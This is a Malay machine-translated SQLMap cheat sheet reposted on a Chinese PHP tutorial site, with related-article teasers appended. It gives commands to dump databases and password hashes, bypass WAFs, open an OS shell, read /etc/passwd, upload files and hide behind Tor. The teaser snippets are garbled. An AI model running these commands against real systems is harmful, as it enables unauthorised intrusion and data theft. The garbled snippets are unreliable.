Helaian Penipuan SQLMap: Panduan Pantas untuk Suntikan SQL Automatik-Tutorial Python-php.cn

Rumah

pembangunan bahagian belakang

Tutorial Python

Helaian Penipuan SQLMap: Panduan Pantas untuk Suntikan SQL Automatik

Linda Hamilton

Sep 26, 2024 pm 03:30 PM

SQLMap Cheat Sheet: A Quick Guide for Automated SQL Injection

Pengarang: Trix Cyrus

Apakah itu SQLMap?
SQLMap ialah alat ujian penembusan sumber terbuka yang digunakan untuk mengesan dan mengeksploitasi kelemahan suntikan SQL dalam aplikasi web. Ia menyokong pelbagai sistem pangkalan data seperti MySQL, PostgreSQL, Oracle, Microsoft SQL Server dan banyak lagi.

Penggunaan Asas
Untuk bermula dengan SQLMap, anda boleh menjalankannya dalam bentuk yang paling mudah dengan menyediakan URL sasaran:

sqlmap -u "http://example.com/index.php?id=1"

Arahan ini mengimbas URL sasaran untuk mencari kelemahan suntikan SQL.

1. Mengesan Kerentanan
Gunakan pilihan berikut untuk melakukan imbasan kelemahan asas dan mengesan titik suntikan SQL secara automatik:

sqlmap -u "http://example.com/index.php?id=1" --dbs

--dbs: Menyenaraikan semua pangkalan data yang tersedia pada pelayan sasaran jika kelemahan ditemui.

2. Menentukan Permintaan POST

Untuk sasaran yang memerlukan permintaan POST (biasanya dalam borang log masuk), anda boleh menentukan data seperti ini:

sqlmap -u "http://example.com/login.php" --data="username=admin&password=1234"

3. Memintas WAF dan Penapis

Untuk mengelak Tembok Api Aplikasi Web (WAF), SQLMap menyertakan teknik penyamaran muatan:

sqlmap -u "http://example.com/index.php?id=1" --tamper=space2comment

--tamper: Menggunakan skrip tamper untuk mengelak penapis. Contoh: space2comment, charencode.

4. Mengekstrak Pangkalan Data, Jadual dan Lajur
Untuk mendapatkan senarai pangkalan data pada sistem sasaran:

sqlmap -u "http://example.com/index.php?id=1" --dbs

Setelah pangkalan data dikenal pasti, ekstrak jadualnya:

sqlmap -u "http://example.com/index.php?id=1" -D database_name --tables

Untuk mendapatkan lajur daripada jadual tertentu:

sqlmap -u "http://example.com/index.php?id=1" -D database_name -T table_name --columns

5. Lambakan Data

Melambakkan kandungan jadual ialah salah satu ciri SQLMap yang paling berguna. Contohnya, untuk membuang semua data daripada jadual tertentu:

sqlmap -u "http://example.com/index.php?id=1" -D database_name -T table_name --dump

6. Menghitung Pengguna dan Kata Laluan Pangkalan Data

SQLMap juga boleh digunakan untuk menghitung pengguna pangkalan data dan juga memecahkan kata laluan cincang:

sqlmap -u "http://example.com/index.php?id=1" --users
sqlmap -u "http://example.com/index.php?id=1" --passwords

7. Mengakses Sistem Pengendalian

Dalam sesetengah kes, SQLMap boleh digunakan untuk melaksanakan arahan pada sistem pengendalian, terutamanya apabila pengguna pangkalan data mempunyai keistimewaan peringkat tinggi:

sqlmap -u "http://example.com/index.php?id=1" --os-shell

Ini akan menyediakan shell interaktif di mana anda boleh melaksanakan arahan pada sistem sasaran.

8. Muat Naik Fail dan Bacaan

Anda juga boleh membaca fail daripada sistem sasaran atau memuat naik fail berniat jahat (jika dibenarkan):

sqlmap -u "http://example.com/index.php?id=1" --file-read="/etc/passwd"
sqlmap -u "http://example.com/index.php?id=1" --file-write="/path/to/file" --file-dest="/destination/path"

9. Menggunakan Tor untuk Tanpa Nama

Untuk menyembunyikan identiti anda, anda boleh menjalankan SQLMap melalui rangkaian Tor:

sqlmap -u "http://example.com/index.php?id=1" --tor --tor-type=SOCKS5 --check-tor

--tor: Mendayakan Tor.
--check-tor: Mengesahkan jika sambungan dibuat melalui Tor.

10. Menyimpan dan Menyambung Semula

SQLMap membolehkan anda menyimpan dan menyambung semula kemajuan anda dengan menggunakan pilihan --session:

sqlmap -u "http://example.com/index.php?id=1" --session=your_session_name

Kemudian, anda boleh menyambung semula sesi yang sama dengan:

sqlmap -r your_session_name

11. Mod Verbose

Untuk melihat maklumat terperinci tentang perkara yang dilakukan oleh SQLMap:

sqlmap -u "http://example.com/index.php?id=1" -v 3

Pilihan -v mengawal verbositi (tahap dari 0 hingga 6, dengan 6 menunjukkan semua butiran).

Imbasan Automatik untuk Berbilang Sasaran

SQLMap menyokong mengimbas berbilang URL yang disimpan dalam fail:

sqlmap -m urls.txt --batch

--batch: Jawab semua gesaan secara automatik dengan pilihan lalai, berguna untuk pengimbasan automatik.

juga gunakan --risk=3 dan --level=5 untuk memajukan pengimbasan
Anda boleh menggunakan helaian cheat ini untuk memperkenalkan pembaca kepada arahan penting SQLMap dan membantu mereka bermula dengan ujian suntikan SQL.

~TrixSec

Atas ialah kandungan terperinci Helaian Penipuan SQLMap: Panduan Pantas untuk Suntikan SQL Automatik. Untuk maklumat lanjut, sila ikut artikel berkaitan lain di laman web China PHP!

Kenyataan

Kandungan artikel ini disumbangkan secara sukarela oleh netizen, dan hak cipta adalah milik pengarang asal. Laman web ini tidak memikul tanggungjawab undang-undang yang sepadan. Jika anda menemui sebarang kandungan yang disyaki plagiarisme atau pelanggaran, sila hubungi admin@php.cn

Artikel Berkaitan

Bagaimana anda menambah elemen ke senarai python?May 04, 2025 am 12:17 AM

ToAppendElementStoapyThonList, useTheAppend () methodforsingleelements, extend () formultipleelements, andInsert () forspecificposition.1) useAppend () foraddingOneElementAttheend.2)

Bagaimana anda membuat senarai python? Beri contoh.May 04, 2025 am 12:16 AM

TOCREATEAPYTHONLIST, USESQUAREBRACKETS [] danSeparatateItemSwithCommas.1) listsaredynamicandCanHoldMixedDatypes.2) UseAppend (), mengalih keluar (), danSlicingFormApulation.3)

Bincangkan kes penggunaan dunia sebenar di mana penyimpanan dan pemprosesan data berangka yang cekap adalah kritikal.May 04, 2025 am 12:11 AM

Dalam bidang kewangan, penyelidikan saintifik, penjagaan perubatan dan AI, adalah penting untuk menyimpan dan memproses data berangka dengan cekap. 1) Dalam Kewangan, menggunakan memori yang dipetakan fail dan perpustakaan Numpy dapat meningkatkan kelajuan pemprosesan data dengan ketara. 2) Dalam bidang penyelidikan saintifik, fail HDF5 dioptimumkan untuk penyimpanan data dan pengambilan semula. 3) Dalam penjagaan perubatan, teknologi pengoptimuman pangkalan data seperti pengindeksan dan pembahagian meningkatkan prestasi pertanyaan data. 4) Dalam AI, data sharding dan diedarkan latihan mempercepatkan latihan model. Prestasi dan skalabiliti sistem dapat ditingkatkan dengan ketara dengan memilih alat dan teknologi yang tepat dan menimbang perdagangan antara kelajuan penyimpanan dan pemprosesan.

Bagaimana anda membuat array python? Beri contoh.May 04, 2025 am 12:10 AM

Pythonarraysarecreatedusingthearraymodule, notbuilt-inlikelists.1) importTheArrayModule.2) specifythetypecode, cth., 'I'forintegers.3) Initializewithvalues.arraysofferbettermemoryficiencyficorhomogeneousdatabutflex.

Apakah beberapa alternatif untuk menggunakan garis shebang untuk menentukan penterjemah python?May 04, 2025 am 12:07 AM

Sebagai tambahan kepada garis shebang, terdapat banyak cara untuk menentukan penterjemah python: 1. Gunakan perintah python terus dari baris arahan; 2. Gunakan fail batch atau skrip shell; 3. Gunakan alat binaan seperti membuat atau cmake; 4. Gunakan pelari tugas seperti Invoke. Setiap kaedah mempunyai kelebihan dan kekurangannya, dan penting untuk memilih kaedah yang sesuai dengan keperluan projek.

Bagaimanakah pilihan antara senarai dan tatasusunan memberi kesan kepada prestasi keseluruhan aplikasi Python yang berurusan dengan dataset yang besar?May 03, 2025 am 12:11 AM

Forhandlinglargedatasetsinpython, usenumpyarraysforbetterperformance.1) numpyarraysarememory-efisien danfasterfornumumerical.2) mengelakkan yang tidak dapat dipertahankan.3)

Jelaskan bagaimana memori diperuntukkan untuk senarai berbanding tatasusunan dalam Python.May 03, 2025 am 12:10 AM

Inpython, listsusedynamicMemoryAllocationwithover-peruntukan, pemecahan yang tidak dapat dilaksanakan.1) listsallocatemoremoremorythanneedinitial, resizingwhennessary.2) numpyarraysallocateExactMemoreForelements, menawarkanpredictableSabeBeBeBeBeBeBeBeBeBeBeBeBeBeBeBeBeBeBeBeBeBeBeBeBeBeBeBeBeBeBeBeBeBeBeBeBeBeBeBeBeBeBeBeBeBeBeBeBeBeBeBeBeBeBeBeBeBeBeBeBeat.